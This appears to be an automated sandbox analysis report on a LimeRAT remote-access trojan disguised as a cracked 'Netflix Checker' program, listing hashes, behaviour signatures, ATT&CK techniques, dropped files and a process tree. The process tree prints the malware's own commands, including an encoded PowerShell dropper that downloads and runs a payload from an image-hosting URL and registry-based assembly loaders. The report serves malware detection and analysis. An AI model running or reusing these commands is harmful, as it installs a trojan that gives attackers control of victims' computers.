limerat | 85e6f154baa5c3d5dcbf1b16ed811bbf643582b194d22aaeb440195640d881dd

Analysis

max time kernel
150s
max time network
153s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
19-03-2023 12:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Netflix Checker by GOD Cracked By GM`ka/Netflix by GOD Cracked By GM`ka.exe
Size

184KB
MD5

aa3bb11ee0c84761496dfdb9e6e5b63f
SHA1

8abbf52400836f9e2cc8695f31a44398f0a8a220
SHA256

4b4be96ea88ab429172e0ff04475179478f7afd2784ec0a07ae4bc78b2104d3a
SHA512

3643410c32ccb5202c1bbb8cf79f65bcb7accd36cce45672eacd71c051a2b7e0f253bd18979ac68d91b2272b6666d10916788bf9d340abd660b0f42144dc44d9
SSDEEP

1536:SX4ljePvu7ZTJqCgiv/RbgyPnY9dF0IaJZI6huB2vtChPw:SX4ljH/q4bg4nY9dt2vtChPw

Score

10^/10

limerat rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://6.top4top.net/p_13529t6r71.jpg

Signatures

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1072	powershell.exe
9	2044	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KBnSgEeuZWeY.lnk	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoYUIXZO.lnk	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
768	Checker Netflix.exe

Loads dropped DLL 1 IoCs

pid	Process
1244	procs.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1072	powershell.exe
2044	powershell.exe
832	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	832	powershell.exe
Token: SeDebugPrivilege	2044	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 1760 wrote to memory of 1244	1760	Netflix by GOD Cracked By GM`ka.exe	28
PID 1760 wrote to memory of 1244	1760	Netflix by GOD Cracked By GM`ka.exe	28
PID 1760 wrote to memory of 1244	1760	Netflix by GOD Cracked By GM`ka.exe	28
PID 1760 wrote to memory of 1244	1760	Netflix by GOD Cracked By GM`ka.exe	28
PID 1244 wrote to memory of 768	1244	procs.exe	29
PID 1244 wrote to memory of 768	1244	procs.exe	29
PID 1244 wrote to memory of 768	1244	procs.exe	29
PID 1244 wrote to memory of 768	1244	procs.exe	29
PID 1244 wrote to memory of 1092	1244	procs.exe	30
PID 1244 wrote to memory of 1092	1244	procs.exe	30
PID 1244 wrote to memory of 1092	1244	procs.exe	30
PID 1244 wrote to memory of 1092	1244	procs.exe	30
PID 1244 wrote to memory of 1636	1244	procs.exe	31
PID 1244 wrote to memory of 1636	1244	procs.exe	31
PID 1244 wrote to memory of 1636	1244	procs.exe	31
PID 1244 wrote to memory of 1636	1244	procs.exe	31
PID 1244 wrote to memory of 1484	1244	procs.exe	32
PID 1244 wrote to memory of 1484	1244	procs.exe	32
PID 1244 wrote to memory of 1484	1244	procs.exe	32
PID 1244 wrote to memory of 1484	1244	procs.exe	32
PID 1636 wrote to memory of 1072	1636	WScript.exe	34
PID 1636 wrote to memory of 1072	1636	WScript.exe	34
PID 1636 wrote to memory of 1072	1636	WScript.exe	34
PID 1636 wrote to memory of 1072	1636	WScript.exe	34
PID 1092 wrote to memory of 2044	1092	WScript.exe	36
PID 1092 wrote to memory of 2044	1092	WScript.exe	36
PID 1092 wrote to memory of 2044	1092	WScript.exe	36
PID 1092 wrote to memory of 2044	1092	WScript.exe	36
PID 1484 wrote to memory of 832	1484	WScript.exe	37
PID 1484 wrote to memory of 832	1484	WScript.exe	37
PID 1484 wrote to memory of 832	1484	WScript.exe	37
PID 1484 wrote to memory of 832	1484	WScript.exe	37

C:\Users\Admin\AppData\Local\Temp\Netflix Checker by GOD Cracked By GM`ka\Netflix by GOD Cracked By GM`ka.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Checker by GOD Cracked By GM`ka\Netflix by GOD Cracked By GM`ka.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1760
- C:\Users\Admin\AppData\Local\Temp\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe
  "C:\Users\Admin\AppData\Local\Temp\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1244
- - C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
    "C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"
    3⤵
    - Executes dropped EXE
    PID:768
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\l1l1l.vbs"
    3⤵
    - Drops startup file
    - Suspicious use of WriteProcessMemory
    PID:1092
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\tsQKDrCBEkat).evTHJP).'EntryPoint'.'Invoke'($Null,$Null)
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2044
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\powershell.js"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1636
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ANgAuAHQAbwBwADQAdABvAHAALgBuAGUAdAAvAHAAXwAxADMANQAyADkAdAA2AHIANwAxAC4AagBwAGcAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApAA==
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1072
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\r1r1.vbs"
    3⤵
    - Drops startup file
    - Suspicious use of WriteProcessMemory
    PID:1484
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\vLEwUGUT).gukeLLVoun).'EntryPoint'.'Invoke'($Null,$Null)
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:832

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Checker Netflix.exe

Filesize
1.5MB

MD5
068068c3cefb4c8d997271897c3173bb

SHA1
d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e

SHA256
23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5

SHA512
0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a

Download Submit
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe

Filesize
1.5MB

MD5
068068c3cefb4c8d997271897c3173bb

SHA1
d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e

SHA256
23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5

SHA512
0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2XDZIAHDF44TDDRVFKBC.temp

Filesize
7KB

MD5
874540e084d3bb980a2acd0300a8b825

SHA1
5a0f8c1a920b8364142243a70dc872abfbdea2f7

SHA256
081ef2497d363f1ec5b5b27f324678b6c130eefbf59f858c5263d179937fd72b

SHA512
63e7baf2d258d1af0f9b42fe4c4b7656055b3e917e0ffb48023d3616935cc38eb255b4b8b1cfd3bdc9a84a2ea9c91a059dc5f1ae8a52d798e83c58a5a38c4019

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
874540e084d3bb980a2acd0300a8b825

SHA1
5a0f8c1a920b8364142243a70dc872abfbdea2f7

SHA256
081ef2497d363f1ec5b5b27f324678b6c130eefbf59f858c5263d179937fd72b

SHA512
63e7baf2d258d1af0f9b42fe4c4b7656055b3e917e0ffb48023d3616935cc38eb255b4b8b1cfd3bdc9a84a2ea9c91a059dc5f1ae8a52d798e83c58a5a38c4019

Download Submit
C:\Users\Admin\AppData\Roaming\l1l1l.vbs

Filesize
129KB

MD5
c78f607c916f060d6ee3bf391e303acc

SHA1
1575998cda060d4a570ba258abc12044601da283

SHA256
f1e57d1714f74c6939ee24bb348fa12e925ec7eb380d5a7d0f1d230effb742f4

SHA512
cf26b8b381402622df420fa3881630661d08d76660d01be2d695af8ade568a6f5e3b365e4b17bffee5589d936eeaad3f7ebf413f4a2d810d976b66511548875b

Download Submit
C:\Users\Admin\AppData\Roaming\powershell.js

Filesize
2KB

MD5
40b65baa1541784dd92f5aa8ae11b0ef

SHA1
0772c95f56a025704c01389f2d1108a17fb987cf

SHA256
9609d3a8ee7d439c54aca9c5aeced07caa4199f116367ecb88b63e9e2e29a699

SHA512
fc784babe03c75559314dc15a04386d528e71b003b40349df2a4845576bbc9d2f0898d27fc5b1be8cda9fbf16715822bf0616fa7835e1abefe7ccacc8da3b3d2

Download Submit
C:\Users\Admin\AppData\Roaming\r1r1.vbs

Filesize
87KB

MD5
0494f414da149631c3d59861865dad37

SHA1
c9fd335759efb52e58acb974af27cdecb35d0f10

SHA256
a2effa9551b467c88ccea70024bd13650267752d1d6bcd91a5bd6915d9c47a56

SHA512
a86f2532f2ba996dc8421146d918250b1925daf803a470e3bce312f29a4d0b25af51d4abc005ab390650cb0cf6b4024df3c411e6ae4ed03cd51906b54683f333

Download Submit
\Users\Admin\AppData\Roaming\Checker Netflix.exe

Filesize
1.5MB

MD5
068068c3cefb4c8d997271897c3173bb

SHA1
d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e

SHA256
23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5

SHA512
0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a

Download Submit
memory/768-90-0x0000000000FD0000-0x0000000001010000-memory.dmp

Filesize
256KB

Download
memory/768-71-0x0000000000330000-0x0000000000336000-memory.dmp

Filesize
24KB

Download
memory/768-66-0x0000000001010000-0x0000000001190000-memory.dmp

Filesize
1.5MB

Download
memory/768-97-0x0000000000FD0000-0x0000000001010000-memory.dmp

Filesize
256KB

Download
memory/768-91-0x000000000D6B0000-0x000000000D848000-memory.dmp

Filesize
1.6MB

Download
memory/768-92-0x00000000003D0000-0x00000000003D6000-memory.dmp

Filesize
24KB

Download
memory/832-98-0x0000000002450000-0x0000000002490000-memory.dmp

Filesize
256KB

Download
memory/832-93-0x0000000002450000-0x0000000002490000-memory.dmp

Filesize
256KB

Download
memory/1072-94-0x0000000002690000-0x00000000026D0000-memory.dmp

Filesize
256KB

Download
memory/1072-96-0x0000000002690000-0x00000000026D0000-memory.dmp

Filesize
256KB

Download
memory/1072-99-0x0000000002690000-0x00000000026D0000-memory.dmp

Filesize
256KB

Download
memory/1072-101-0x0000000002690000-0x00000000026D0000-memory.dmp

Filesize
256KB

Download
memory/1760-54-0x0000000001270000-0x00000000012A4000-memory.dmp

Filesize
208KB

Download
memory/1760-55-0x0000000000B10000-0x0000000000B50000-memory.dmp

Filesize
256KB

Download
memory/2044-95-0x00000000026F0000-0x0000000002730000-memory.dmp

Filesize
256KB

Download
memory/2044-100-0x00000000026F0000-0x0000000002730000-memory.dmp

Filesize
256KB

Download